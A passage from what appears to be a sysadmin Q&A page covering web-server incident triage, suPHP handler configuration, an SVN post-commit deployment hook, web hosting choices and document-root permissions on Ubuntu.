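    Given the tight 15-minute window, one way to narrow the search is to pin down the exact modification times of the dropped files and then read the access logs against that window (a sketch with GNU tools; the paths are illustrative):

        # list the planted files with their mtimes, oldest first --
        # the earliest one is probably on the site that was actually exploited
        find /var/www -name .htaccess -user www-data -printf '%T+ %p\n' | sort

        # then pull the requests that hit that vhost in the same window
        # (adjust the timestamp pattern to the window found above),
        # looking especially for POSTs to upload/admin scripts
        grep 'POST' /var/log/apache2/*access*.log | less

    The first file written usually points at the compromised application, and the requests immediately before it tend to include the exploit itself, often a POST to a vulnerable plugin, upload handler, or timthumb-style script.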

  • Can I use HP Recovery Discs for a different hard drive capacity and make?

    - by Fasih Khatib
    About two years ago I created HP Recovery Discs (3 of them). Now my hard drive has crashed, and the new one is still a week from delivery. I was reading up on how to reinstall the genuine OS using the Recovery Discs, as I was not given any Windows 7 installation discs. I did my bit of research after getting answers from the community on what these discs do, and found out on other sites that people experience issues when recovering their OS from the discs, especially when they change the make or capacity of the hard drive. Unfortunately, I had to change the make, as the hard drive that came built in has gone out of production. This question is just a part of my checklist to avoid problems when recovering the OS. I have an HP DV4-2126TX (available only in India, I guess) running Windows 7 Home Premium 32-bit. I had a Seagate Momentus 320 GB, and I ordered a Western Digital Scorpio Black 500 GB. Is there a possibility of encountering problems due to the changed capacity and make? I only want my genuine OS and drivers, not my data. I was told that Disc 1 contained the OS and drivers, and the rest of the discs contained data, but I couldn't verify that.

  • suPHP not working

    - by amarc
    OS: Ubuntu 10.04. /etc/suphp/suphp.conf:

        [global]
        ;Path to logfile
        logfile=/var/log/suphp/suphp.log
        ;Loglevel
        loglevel=info
        ;User Apache is running as
        webserver_user=www-data
        ;Path all scripts have to be in
        docroot=/home
        ;Path to chroot() to before executing script
        ;chroot=/mychroot
        ; Security options
        allow_file_group_writeable=false
        allow_file_others_writeable=false
        allow_directory_group_writeable=false
        allow_directory_others_writeable=false
        ;Check whether script is within DOCUMENT_ROOT
        check_vhost_docroot=true
        ;Send minor error messages to browser
        errors_to_browser=false
        ;PATH environment variable
        env_path=/bin:/usr/bin
        ;Umask to set, specify in octal notation
        umask=0077
        ; Minimum UID
        min_uid=100
        ; Minimum GID
        min_gid=100

        [handlers]
        ;Handler for php-scripts
        application/x-httpd-suphp="php:/usr/bin/php-cgi"
        ;Handler for CGI-scripts
        x-suphp-cgi="execute:!self"

    A vhost in sites-enabled:

        NameVirtualHost *:8080
        <VirtualHost *:8080>
            ServerAdmin ...
            ServerName ...
            ServerAlias ...
            AddType application/x-httpd-php .php
            AddHandler application/x-httpd-php .php
            suPHP_Engine on
            suPHP_UserGroup user user
            suPHP_ConfigPath "/home/user/etc"
            suPHP_PHPPath /usr/bin
            DocumentRoot /home/user/web/site.com/
            ErrorLog /var/log/apache2/site.com-error_log
            CustomLog /var/log/apache2/site.com-access_log common
            <Directory /home/user/web/site.com/>
                Order Deny,Allow
                Allow from all
                Options +Indexes
            </Directory>
        </VirtualHost>

    But when I created /home/user/web/id.php with <?php system('id'); ?> in it, the result I get is:

        uid=33(www-data) gid=33(www-data) groups=33(www-data)

    I have no idea what to do, so I was hoping the community could help. Thank you.
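
    The id output showing www-data means the script was executed by mod_php, not by suPHP: the vhost's AddHandler maps .php to application/x-httpd-php, while suphp.conf only registers a handler for application/x-httpd-suphp. A sketch of the usual fix (module names as shipped by the Ubuntu packages; restart Apache after the changes):

        # stop mod_php from claiming .php files, make sure suPHP is active
        a2dismod php5
        a2enmod suphp
        service apache2 restart

    and in the vhost, hand .php to suPHP's own handler type:

        AddType application/x-httpd-suphp .php
        suPHP_AddHandler application/x-httpd-suphp

    With mod_php disabled and the handler type matched to the [handlers] section, system('id') should report the user from suPHP_UserGroup instead of www-data.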

  • Automatically update SVN repository on another server

    - by Mikey C
    We have 2 Ubuntu web servers, one of which is our staging server (Staging) and the other our live server (Live). Staging has our Subversion repository, as well as the latest version of our sites on it. Because the SVN server is running on Staging, I've added post-commit hook scripts so that the staging server automatically has the latest code. Easy. However, I'd like one of the repositories on Live to stay updated as well. This is a repository of images, PDFs, and suchlike. When a team member commits to it, I'd like it to automatically update on the live server so it can be used in mailings, content-managed pages, etc. I'd add something to the post-commit hook to SSH across and update, but for security we can only SSH from one server to another as the user 'commandLine', whereas the post-commit hook runs as the 'www-data' user. I'd rather not run a cron job on Live to update every 5 minutes, but I can't see another way of doing it without altering all our user permissions. Any ideas?
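
    One pattern that fits the constraint is to let www-data escalate to commandLine for exactly one command via sudo. A sketch (the hostname and paths are hypothetical; commandLine needs a passwordless SSH key for Live, and the sudoers line should be added with visudo):

        # /etc/sudoers.d/svn-deploy on Staging
        www-data ALL = (commandLine) NOPASSWD: /usr/bin/ssh live.example.com svn update /var/www/assets

        # hooks/post-commit in the assets repository
        #!/bin/sh
        sudo -u commandLine /usr/bin/ssh live.example.com svn update /var/www/assets >/dev/null 2>&1 &

    Pinning the full command line in sudoers means www-data cannot run arbitrary SSH commands as commandLine, which keeps the original "only commandLine may SSH across" policy intact; backgrounding the call keeps commits from blocking on the network.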

  • The Web Hosting Connundrum for "not quite" developers

    - by saltcod
    Hey all, apologies if this post feels like it's been covered elsewhere, but I don't think it has. I've been down a winding web-hosting road. To date, I've tried Joyent, Media Temple, Bluehost, HostGator, and finally Linode. The reason for switching is likely obvious to everyone: speed. With the exception of the lightning-fast Linode, all of the shared hosts are absolutely slow. What to do when you're not really a "developer"? While I've grown addicted to the speed of Linode, I really don't feel like it's where I should be. I have this nagging feeling in the back of my mind that one of these days (likely soon) I'm going to run into something that I won't be able to figure out, and I'll have days' worth of downtime. Just the other day, for example, I realized that one of my domains wasn't sending emails. After 4(!) hours looking into the problem, I still can't get sendmail or postfix to work. Four hours! I want to be a Drupal expert, not an Ubuntu expert. That's really the heart of my problem: I spend way too much time learning Ubuntu's ins and outs, and not nearly enough time working on Drupal. So here goes: is there a web host out there anywhere that offers the speed of Linode but will let me focus on Drupal instead of sysadmin-ing? Thanks! [I know, I know. There are going to be lots of people who read this saying "just learn Ubuntu like a real developer". And I get that, I do. But when I work full-time and try to develop some of these sites in my evenings and weekends, I really feel like the sysadmin stuff gets in the way.]

  • How to add a writable folder to the PHP document root on linux

    - by Ron Whites
    We are building an example bash script for our PHP test-coverage tool for use on Linux. The development environment is Ubuntu 12.04.1, but we intend for the Linux example to work across as many Linux versions as possible without modification. The example script requires a variable to be set to the PHP document root path, and by default uses a small PHP example source to show the user how our GUI and text report display the covered and uncovered PHP code areas. The script is also intended to be easily alterable by the user, to automate the test-coverage display of the user's own PHP code. The problem we are having with Ubuntu 12.04 (any Linux?) is that the PHP Apache2 document root is defined in /etc/apache2/sites-available/default as /var/www, and /var/www defaults to "drwxr-xr-x" read-only access. So in order to add our own folder as /var/www/SDTestCoverage, we must change /var/www to "drwxrwxrwx" read-write access. It seems our script (at least on Ubuntu) will need to: 1. acquire and save the /var/www permissions, then 2. sudo chmod 777 /var/www (to make it writable), 3. mkdir -p /var/www/SDTestCoverage (create our folder under the document root), 4. sudo chmod 777 /var/www/SDTestCoverage (make our subfolder writable), and 5. finally restore the /var/www permissions. Thanks, and our questions are: 1. Is this the standard way (on Ubuntu) one adds a writable folder under the PHP document root? 2. Is this the most general-purpose way one adds a writable folder under the PHP document root on other versions of Linux?
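
    A direct transcription of those five steps into shell (a sketch; it must run under sudo, and stat -c is the GNU coreutils form):

        #!/bin/sh
        # create a writable folder under the Apache document root,
        # restoring the document root's original permissions afterwards
        DOCROOT=/var/www
        OLDMODE=$(stat -c '%a' "$DOCROOT")    # 1. save current permissions
        chmod 777 "$DOCROOT"                  # 2. open the docroot temporarily
        mkdir -p "$DOCROOT/SDTestCoverage"    # 3. create the subfolder
        chmod 777 "$DOCROOT/SDTestCoverage"   # 4. make it writable
        chmod "$OLDMODE" "$DOCROOT"           # 5. restore the original mode

    That said, the temporary chmod of /var/www is unnecessary when the script already runs as root: root can create the directory regardless of the mode, so steps 1, 2, and 5 can be dropped, and a group-writable mode (for example chown to the invoking user, or 775 with a shared group) is a less blunt instrument than 777 for the new folder.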
